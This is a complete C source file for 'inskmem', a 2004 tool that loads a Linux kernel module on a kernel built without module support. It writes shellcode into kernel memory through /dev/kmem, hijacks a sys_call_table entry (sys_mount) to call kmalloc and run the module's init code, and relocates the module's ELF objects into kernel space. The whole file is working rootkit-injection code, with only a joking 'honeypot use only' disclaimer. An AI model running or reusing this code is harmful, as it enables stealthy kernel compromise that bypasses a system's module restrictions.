/***********************************************************
 * inskmem.c
 *
 * LKM loader without the need of LKM support :-)
 * (but needs read/write permissions to /dev/kmem)
 *
 * Uses System.map to find the kernel symbols.
 * Hint: use kmalloc and symbolminer.o to find these even if
 *       you don't have a System.map for the running kernel.
 *       Use kmalloc to build a minimal System.map containing
 *       the addresses for kmalloc, printk and kfree, then
 *       insert symbolminer.o using inskmem. You get a rather
 *       complete System.map.
 *
 * (c) 2004 void.at
 * greuff <greuff@void.at>
 * for private use on honeypot-boxen only :-)
 *
 * HOW THIS ALL FITS TOGETHER:
 * Overall algorithm:
 * 1.) find the location of sys_call_table - done
 * 2.) find the location of the kmalloc call
 * 3.) backup the first n bytes of a seldom used syscall
 * 4.) copy a routine there that effectively calls kmalloc and returns
 *     to us the location of the newly allocated memory space
 * 5.) trigger the kmalloc with int $0x80
 * 6.) restore the backup'd bytes
 * 7.) get all the other symbols needed by the LKM
 * 8.) link the LKM into the kernel
 * 9.) copy the relocated LKM to the allocated space
 * a.) call init_module
 * b.) done
 *
 * Links collection:
 * [1] http://www.phrack.org/show.php?p=58&a=7
 * [2] http://packetstorm.icx.fr/9901-exploits/runtime-kernel-kmem-patching.txt
 *
 ***********************************************************/

#define _GNU_SOURCE

/* includes */
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <errno.h>
#include <termios.h>
#include <sys/fcntl.h>
#include <asm/ioctls.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/ioctl.h>
#include <pty.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <string.h>
#include <linux/unistd.h>    // for syscall numbers (__NR_write)
#include <elf.h>
#include "config.h"

// offset for size: 7
// offset for kmalloc addr: 12
char kmalloccode[]="\x53"                  // push %ebx
                   "\x68\xf0\x01\x00\x00"  // push $0x1F0
                   "\x68\xdd\xcc\xbb\xaa"  // push $0xaabbccdd
                   "\xbb\x30\x20\x10\xc0"  // mov $0xc0102030,%ebx
                   "\xff\xd3"              // call *%ebx
                   "\x5b"                  // pop %ebx
                   "\x5b"                  // pop %ebx
                   "\x5b"                  // pop %ebx
                   "\xc3";                 // ret
int kmalloccode_len=22;      // contains \x00 so we can't use strlen
int kmalloc_syscall=__NR_mount;

#define ELF_MAGIC "\x7f""ELF"

// the interrupt descriptor table register
struct
{
   unsigned short limit;
   unsigned int base;
} __attribute__ ((packed)) idtr;

// an interrupt descriptor table entry
struct
{
   unsigned short off1;
   unsigned short sel;
   unsigned char none, flags;
   unsigned short off2;
} __attribute__ ((packed)) idt;

struct symtab_ent { unsigned long address; char name[50]; } *symtab=NULL;
unsigned int symtab_count=0;

unsigned long sys_call_table;

unsigned long my_kmalloc(int kmemfd,size_t size);
int help();
void readsymbols(char *filename);
void readkmem(int kmemfd, unsigned long offset, void *buffer, unsigned int size);
void writekmem(int kmemfd, unsigned long offset, void *buffer, unsigned int size);
unsigned long get_sys_call_table(int kmemfd);
unsigned long do_elflink(int kmemfd,unsigned long baseaddr,int modfd,unsigned long modsize);
unsigned long lookupsymbol(char *symbolname);

/* let the party start */
int main(int argc, char **argv)
{
   int kmemfd, modfd;
   struct stat st;
   unsigned long addr;
   unsigned long addr_allocd;
   unsigned long modulesize=1337, init_module_addr;

   printf("inskmem - (c) 2003 by void.at\ngreuff <greuff@void.at>\n\n");
   if(argc!=3)
   {
      help();
      return -1;
   }

   printf("Opening /dev/kmem for read/write... ");
   kmemfd=open("/dev/kmem",O_RDWR);
   if(kmemfd<0)
   {
      perror("Can't open /dev/kmem");
      return -1;
   }
   printf("fd %d\n",kmemfd);
   printf("Determining the location of sys_call_table... ");
   // you can try and get the sys_call_table address directly
   // from the kernel space, but this didn't always work for me
   // sys_call_table=get_sys_call_table(kmemfd);
   if(strcmp(argv[1],"--remove"))
   {
      printf("Reading symbols from %s...\n",argv[1]);
      readsymbols(argv[1]);
   }
   sys_call_table=lookupsymbol("sys_call_table");
   if(sys_call_table==0)
   {
      printf("failed\n");
      close(kmemfd);
      return -1;
   }
   printf("0x%08x\n",sys_call_table);

   if(!strcmp(argv[1],"--remove"))
   {
      // module removal mode
      unsigned long cleanup_addr=strtoul(argv[2],NULL,16);
      printf("Unloading module at address 0x%08x...\n",cleanup_addr);

      readkmem(kmemfd,sys_call_table+4*kmalloc_syscall,&addr,4);
      writekmem(kmemfd,sys_call_table+4*kmalloc_syscall,&cleanup_addr,4);
      asm("mov %0,%%eax\n"
          "int $0x80\n" : : "m" (kmalloc_syscall));
      writekmem(kmemfd,sys_call_table+4*kmalloc_syscall,&addr,4);
   }
   else
   {
      printf("Using module '%s'... ",argv[2]);
      if(stat(argv[2],&st)<0)
      {
         printf("\nCan't stat %s: %s\n",argv[2],strerror(errno));
         return -1;
      }
      modulesize=st.st_size;
      printf("module size is %ld\n",modulesize);
      if((modfd=open(argv[2],O_RDONLY))<0)
      {
         fprintf(stderr,"Can't open %s: %s\n",argv[2],strerror(errno));
         return -1;
      }
   
      addr_allocd=my_kmalloc(kmemfd,modulesize);
      if(addr_allocd==0)
      {
         printf("kmalloc failed!\n");
         return -1;
      }
      printf("\nAddress of allocated space in kernel: 0x%08x :-))\n\n",addr_allocd);
   
      printf("Linking module into kernel space ...\n");
      init_module_addr=do_elflink(kmemfd,addr_allocd,modfd,modulesize);
   
      printf("Starting the module at address 0x%08x...\n",init_module_addr);
      // Start the module by overwriting the pointer to sys_malloc and setting
      // its address to the module's init_module. Call int 0x80. Restore the
      // pointer to sys_malloc
      readkmem(kmemfd,sys_call_table+4*kmalloc_syscall,&addr,4);
      writekmem(kmemfd,sys_call_table+4*kmalloc_syscall,&init_module_addr,4);
      asm("mov %0,%%eax\n"
          "int $0x80\n" : : "m" (kmalloc_syscall));
      writekmem(kmemfd,sys_call_table+4*kmalloc_syscall,&addr,4);
   
      close(modfd);
   }
   close(kmemfd);
   if(symtab) free(symtab);
   printf("work done!\n");
   return 0;  // to keep compiler happy
}

unsigned long my_kmalloc(int kmemfd,size_t size)
{
   char *km_backup;
   unsigned long addr, addr_allocd;
   unsigned long itemaddr;

   printf("Backing up %d bytes from sys_mount...\n",kmalloccode_len);
   km_backup=(char *)malloc(kmalloccode_len);
   if(km_backup==NULL)
   {
      printf("WTF??\n");
      return -1;
   }

   // get address of the syscall
   readkmem(kmemfd,sys_call_table+4*kmalloc_syscall,&addr,4);
   // backup the first n bytes of the syscall
   readkmem(kmemfd,addr,km_backup,kmalloccode_len);

   // we have to correct the size and address argument in the kmalloccode
   itemaddr=lookupsymbol("kmalloc");
   printf("Patching \"shellcode\" using address 0x%08x and size %ld...\n",itemaddr,
      size);
   *(unsigned long *)(kmalloccode+7)=size;
   *(unsigned long *)(kmalloccode+12)=itemaddr;

   printf("Writing the kmalloc triggering code ...\n");
   writekmem(kmemfd,addr,kmalloccode,kmalloccode_len);

   printf("Triggering the code (effectively calling kmalloc)...\n");
   asm("push %%eax\n"
       "mov %1, %%eax\n"
       "int $0x80\n"
       "mov %%eax, %0\n"
       "pop %%eax\n" : "=m" (addr_allocd) : "m" (kmalloc_syscall));

   printf("Restoring sys_mount ...\n");
   writekmem(kmemfd,addr,km_backup,kmalloccode_len);

   free(km_backup);

   return addr_allocd;
}

/***********************************************************************/

/******************************************************
 * get_sys_call_table
 *
 * \param kmemfd file descriptor of opened /dev/kmem
 * \returns address of sys_call_table
 ******************************************************/
unsigned long get_sys_call_table(int kmemfd)
{
   unsigned long sys_call_off;
   unsigned char buffer[100];
   void *ptr;
   
   // read IDTR
   asm("sidt %0" : "=m" (idtr));
   printf("   idtr base at 0x%08x\n",(int)idtr.base);

   // get IDT for int $0x80
   readkmem(kmemfd,idtr.base+0x80*8,&idt,sizeof(idt));

   // compute the beginning of the ISR of int 0x80
   sys_call_off=(idt.off2<<16)|idt.off1;
   printf("   sys_call_off=0x%08x\n",sys_call_off);

   // read the first 100 bytes of the ISR into memory to
   // locate the sys_call_table (see [1] for details)
   readkmem(kmemfd,sys_call_off,buffer,sizeof(buffer));

   ptr=(void *)memmem(buffer,sizeof(buffer),"\xff\x14\x85",3);

   if(ptr)
   {
      unsigned long sys_call_table=*(unsigned long *)(ptr+3);
      //printf("located at 0x%08x\n",sys_call_table);
      return sys_call_table;
   }
   else
   {
      printf("   unable to find sys_call_table!\n");
      return 0;
   }
}

/***********************************************************************/

/* function:   help
 * parameter:   none
 *
 * display help screen ;)
 * return:
 */
int help() {
   printf("Usage: inskmem System.map module.o\n");
   printf("       inskmem --remove address_of_cleanup_module\n\n");
   printf("This program links an LKM into kernel space without the need of\n"
          "module support. You need read/write access to /dev/kmem or else\n"
	  "it won't work.\n\n");
   return 0;
}

/******************************************************
 * readsymbols
 *
 * Fill the symtab array with the symbols from filename (System.map-format)
 *
 * \param filename Name of the System.map-file
 ******************************************************/
void readsymbols(char *filename)
{
   FILE *fp;
   unsigned char line[1000];
   unsigned int lines, i;

   fp=fopen(filename,"r");
   if(!fp)
   {
      perror("fopen");
      exit(-1);
   }
   // line count
   for(lines=0;fgets(line,sizeof(line),fp)!=0;lines++);
   printf("  %s: %d symbols\n",filename,lines);
   symtab_count=lines;

   // allocate symtab array
   symtab=(struct symtab_ent *)malloc(sizeof(struct symtab_ent)*lines);
   if(symtab==NULL)
   {
      perror("malloc");
      exit(-1);
   }

   rewind(fp);

   for(i=0;i<lines && fgets(line,sizeof(line),fp)!=0;i++)
   {
      unsigned char *ptr, *ptr2;
      line[strlen(line)-1]=0;
      ptr=strchr(line,' ');
      if(ptr==NULL)
      {
         printf("%s format error\n",filename);
         exit(-1);
      }
      *ptr=0;
      symtab[i].address=strtoul(line,NULL,16);
      *ptr=' ';
      ptr2=strchr(ptr+1,' ');
      if(ptr2==NULL)
      {
         // could be a symbol from /proc/ksyms
         snprintf(symtab[i].name,sizeof(symtab[i].name),"%s",ptr+1);
      }
      else
      {
         snprintf(symtab[i].name,sizeof(symtab[i].name),"%s",ptr2+1);
      }

     // printf("  Read symbol: |%s| (address 0x%08x)\n",symtab[i].name,symtab[i].address);
   }

}

/******************************************************
 * readkmem
 *
 * Helper function, reads bytes from /dev/kmem
 *
 * \param kmemfd file descriptor of opened /dev/kmem
 * \param offset offset in /dev/kmem ("address" in kernel space :-))
 * \param buffer buffer to write the data to
 * \param size amount of bytes to read
 ******************************************************/
void readkmem(int kmemfd, unsigned long offset, void *buffer, unsigned int size)
{
   if(lseek(kmemfd,offset,SEEK_SET)!=offset)
   {
      perror("kmem lseek");
      exit(-1);
   }
   if(read(kmemfd,buffer,size)!=size)
   {
      printf("readkmem: offset = %ld (0x%08x), size = %u\n",offset,offset,size);
      perror("kmem read");
      exit(-1);
   }
}

/******************************************************
 * writekmem
 *
 * Helper function, writes bytes to /dev/kmem
 *
 * \param kmemfd file descriptor of opened /dev/kmem
 * \param offset offset in /dev/kmem ("address" in kernel space :-))
 * \param buffer buffer to read the data from
 * \param size amount of bytes to write
 ******************************************************/
void writekmem(int kmemfd, unsigned long offset, void *buffer, unsigned int size)
{
   if(lseek(kmemfd,offset,SEEK_SET)!=offset)
   {
      perror("kmem lseek");
      exit(-1);
   }
   if(write(kmemfd,buffer,size)!=size)
   {
      perror("kmem read");
      exit(-1);
   }
}

/******************************************************
 * do_elflink
 *
 * relocation function. Reads the module into memory and
 * relocates all symbols to fit into the newly allocated
 * kernel space :-). When done, writes the module to kernel
 * space.
 *
 * \param kmemfd file descriptor to opened /dev/kmem
 * \param baseaddr base address for the module in kernel space
 * \param modfd file descriptor of the opened module
 * \param modsize file length of the module
 * \returns address of the module's entry function, i.e. init_module
 *
 ******************************************************/
unsigned long do_elflink(int kmemfd,unsigned long baseaddr,int modfd,unsigned long modsize)
{
   char *elf_ptr;
   Elf32_Ehdr *elfhdr;
   Elf32_Shdr *shdr;
   Elf32_Sym *sym;
   char **sections;
   unsigned long init_module_addr;
   unsigned long do_alloc=0, do_alloc_addr=0, do_alloc_pos=0;
   int i,j,symtabidx;

   sym=NULL;
   elf_ptr=(char *)malloc(modsize);
   if(elf_ptr==NULL)
   {
      printf("WTH??\n");
      exit(-1);
   }
   if(read(modfd,elf_ptr,modsize)!=modsize)
   {
      fprintf(stderr,"can't read: %s\n",strerror(errno));
      exit(-1);
   }

   // module sanity check
   elfhdr=(Elf32_Ehdr *)elf_ptr;

   if(strncmp(&elfhdr->e_ident[EI_MAG0], ELF_MAGIC, 4) ||
      (elfhdr->e_ident[EI_CLASS] != ELFCLASS32) ||
      (elfhdr->e_ident[EI_DATA] != ELFDATA2LSB) ||
      (elfhdr->e_type != ET_REL) ||
      (elfhdr->e_machine != EM_386) ||
      (elfhdr->e_version != 1))
   {
      printf("module failed ELF sanity check\n");
      exit(-1);
   }

   // allocate pointer array to point into the single sections
   sections=(char **)malloc(elfhdr->e_shnum*sizeof(char *));
   if(sections==NULL)
   {
      printf("WTHx2??\n");
      exit(-1);
   }

   shdr=(Elf32_Shdr *)(elf_ptr+elfhdr->e_shoff);
   // point to the sections
   for(i=0;i<elfhdr->e_shnum;i++)
   {
      sections[i]=(char *)elf_ptr+shdr[i].sh_offset;
      if(shdr[i].sh_type==SHT_SYMTAB)
      {
         sym=(Elf32_Sym *)(elf_ptr+shdr[i].sh_offset);
         symtabidx=i;
      }
   }
   if(sym==NULL)
   {
      printf("can't locate symbol table in module\n");
      exit(-1);
   }
   // search for the module's entry point, get total size of
   // not-yet-allocated symbols
   for(i=0;i<elfhdr->e_shnum;i++)
   {
      if(shdr[i].sh_type==SHT_SYMTAB)
      {
         for(j=0;j<shdr[i].sh_size/sizeof(Elf32_Sym);j++)
         {
            if(!strcmp(sections[shdr[i].sh_link]+sym[j].st_name,"init_module"))
            {
               init_module_addr=baseaddr+shdr[sym[j].st_shndx].sh_offset+sym[j].st_value;
               printf("  found module's entry point - address is 0x%08x\n",init_module_addr);
            }
            if(sym[j].st_shndx==SHN_COMMON)
            {
               // allocate space for the symbol
               do_alloc+=sym[j].st_size;
               sym[j].st_value=do_alloc_pos; // store address offset in st_value
               printf("  SHN_COMMON: offset is %u with size %u\n",do_alloc_pos,sym[j].st_size);
               do_alloc_pos+=sym[j].st_size;
            }
         }
      }
      else if(shdr[i].sh_type==SHT_NOBITS)
      {
         // section defines application data, but no space occupied - allocate some space
         do_alloc+=shdr[i].sh_size;
         shdr[i].sh_addr=do_alloc_pos; // store address offset in sh_addr
         printf("  SHT_NOBITS: offset is %u with size %u\n",do_alloc_pos,shdr[i].sh_size);
         do_alloc_pos+=shdr[i].sh_size;
      }
   }

   if(do_alloc!=0)
   {
      unsigned long l;
      char c=0;
      do_alloc_addr=my_kmalloc(kmemfd,do_alloc);
      if(do_alloc_addr==0)
      {
         printf("kmalloc failed\n");
         exit(-1);
      }
      printf("  had to reallocate %ld more bytes to hold SHN_COMMON and "
             "SHT_NOBITS objects\n",do_alloc);
      printf("  address is 0x%08x (in kernel space, of course :-))\n",do_alloc_addr);

      // initialize with zeroes
      for(l=0;l<do_alloc;l++)
      {
         writekmem(kmemfd,l+do_alloc_addr,&c,1);
      }
   }

   // for each section...
   for(i=0;i<elfhdr->e_shnum;i++)
   {
      if(shdr[i].sh_type==SHT_REL)
      {
         // go through the relocations
         Elf32_Rel *rel;
         Elf32_Sym *sym_to_relocate;
         Elf32_Shdr *affected_section;
         unsigned long symaddr;
         unsigned long sym_location_in_section;
         unsigned long *relloc;
         char *symbolname;

         rel=(Elf32_Rel *)(elf_ptr+shdr[i].sh_offset);
         for(j=0;j<shdr[i].sh_size/sizeof(Elf32_Rel);j++)
         {
            // 1.) calculate address of symbol
            sym_to_relocate=&sym[ELF32_R_SYM(rel[j].r_info)];
            symbolname=elf_ptr+shdr[shdr[symtabidx].sh_link].sh_offset+
                       sym_to_relocate->st_name;
           // printf("  relocating |%s|... \n",symbolname);
            if(sym_to_relocate->st_shndx==SHN_UNDEF)
            {
               unsigned long itemaddr;
               char *ptr;
               // undefined symbol - so it must be a kernel symbol. get its address.
               // strip these silly modversions tags from the symbol name, if any
               if((ptr=strrchr(symbolname,'_')))
                  if(ptr[1]=='R')
                     *ptr=0;
                     
               itemaddr=lookupsymbol(symbolname);
               if(itemaddr==0)
               {
                  printf("undefined external symbol |%s|\n",symbolname);
                  exit(-1);
               }
               symaddr=itemaddr;
            }
            else if(sym_to_relocate->st_shndx==SHN_COMMON)
            {
               symaddr=do_alloc_addr+sym_to_relocate->st_value;
            }
            else
            {
               affected_section=&shdr[sym_to_relocate->st_shndx];
               if(affected_section->sh_type==SHT_NOBITS)
               {
                  symaddr=do_alloc_addr+affected_section->sh_addr+sym_to_relocate->st_value;
               }
               else
               {
                  symaddr=affected_section->sh_offset+sym_to_relocate->st_value;
                  symaddr+=baseaddr;
               }
            }

            // 2.) get symbol location in the affected section
            sym_location_in_section=shdr[shdr[i].sh_info].sh_offset+rel[j].r_offset;

            // 3.) get pointer to the location where the relocation shall take place
            relloc=(unsigned long *)(elf_ptr+sym_location_in_section);

            sym_location_in_section+=baseaddr;

            // 4.) calculate the relocation
            switch(ELF32_R_TYPE(rel[j].r_info))
            {
               case R_386_PC32:
                  *relloc=*relloc+symaddr-sym_location_in_section;
                  break;
               case R_386_32:
                  *relloc=*relloc+symaddr;
                  break;
               default:
                  printf("Unsupported relocation type: %d\n",ELF32_R_TYPE(rel[j].r_info));
                  exit(-1);
            }
         }
      }
   }

#ifdef DEBUG
   // write out the whole module for analysis
   {
      int fd;
      if((fd=open("dummy.o.reloc",O_CREAT|O_WRONLY|O_TRUNC,0644))<0)
      {
         perror("open");
         exit(-1);
      }
      if(write(fd,elf_ptr,modsize)<0)
      {
         perror("write");
         exit(-1);
      }
      close(fd);
   }
#endif

   // write the relocated module to kernel space
   writekmem(kmemfd,baseaddr,elf_ptr,modsize);

   free(sections);
   free(elf_ptr);
   return init_module_addr;
}

/******************************************************
 * lookupsymbol
 *
 * finds a relocation item by its name
 *
 * \param symbolname Name of the item to search for
 * \returns address of the symbol or 0 if not found
 *
 ******************************************************/
unsigned long lookupsymbol(char *symbolname)
{
   unsigned int i;
   int found=0;
   for(i=0;i<symtab_count && found==0;)
   {
      if(!strcmp(symtab[i].name,symbolname))
         found=1;
      else
         i++;
   }
   return found==1 ? symtab[i].address : 0;
}

